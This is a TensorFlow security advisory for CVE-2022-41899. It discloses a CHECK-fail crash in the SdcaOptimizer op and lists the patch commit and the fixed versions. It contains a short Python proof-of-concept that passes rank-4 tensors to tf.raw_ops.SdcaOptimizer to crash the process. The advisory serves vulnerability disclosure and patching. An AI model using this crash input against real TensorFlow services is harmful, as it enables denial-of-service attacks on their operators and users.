## TFSA-2022-161: `CHECK` fail via inputs in `SdcaOptimizer`

### CVE Number
CVE-2022-41899

### Impact
Inputs `dense_features` or `example_state_data` not of rank 2 will trigger a `CHECK` fail in [`SdcaOptimizer`](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/core/kernels/sdca_internal.cc).

```python
import tensorflow as tf

tf.raw_ops.SdcaOptimizer(
    sparse_example_indices=4 * [tf.random.uniform([5,5,5,3], dtype=tf.dtypes.int64, maxval=100)],
    sparse_feature_indices=4 * [tf.random.uniform([5,5,5,3], dtype=tf.dtypes.int64, maxval=100)],
    sparse_feature_values=8 * [tf.random.uniform([5,5,5,3], dtype=tf.dtypes.float32, maxval=100)],
    dense_features=4 * [tf.random.uniform([5,5,5,3], dtype=tf.dtypes.float32, maxval=100)],
    example_weights=tf.random.uniform([5,5,5,3], dtype=tf.dtypes.float32, maxval=100),
    example_labels=tf.random.uniform([5,5,5,3], dtype=tf.dtypes.float32, maxval=100),
    sparse_indices=4 * [tf.random.uniform([5,5,5,3], dtype=tf.dtypes.int64, maxval=100)],
    sparse_weights=4 * [tf.random.uniform([5,5,5,3], dtype=tf.dtypes.float32, maxval=100)],
    dense_weights=4 * [tf.random.uniform([5,5,5,3], dtype=tf.dtypes.float32, maxval=100)],
    example_state_data=tf.random.uniform([5,5,5,3], dtype=tf.dtypes.float32, maxval=100),
    loss_type="squared_loss",
    l1=0.0,
    l2=0.0,
    num_loss_partitions=1,
    num_inner_iterations=1,
    adaptative=False,)
```

### Patches
We have patched the issue in GitHub commit [80ff197d03db2a70c6a111f97dcdacad1b0babfa](https://github.com/tensorflow/tensorflow/commit/80ff197d03db2a70c6a111f97dcdacad1b0babfa).

The fix will be included in TensorFlow 2.11. We will also cherrypick this commit on TensorFlow 2.10.1, 2.9.3, and TensorFlow 2.8.4, as these are also affected and still in supported range.


### For more information
Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.


### Attribution
This vulnerability has been reported by Zizhuang Deng of IIE, UCAS
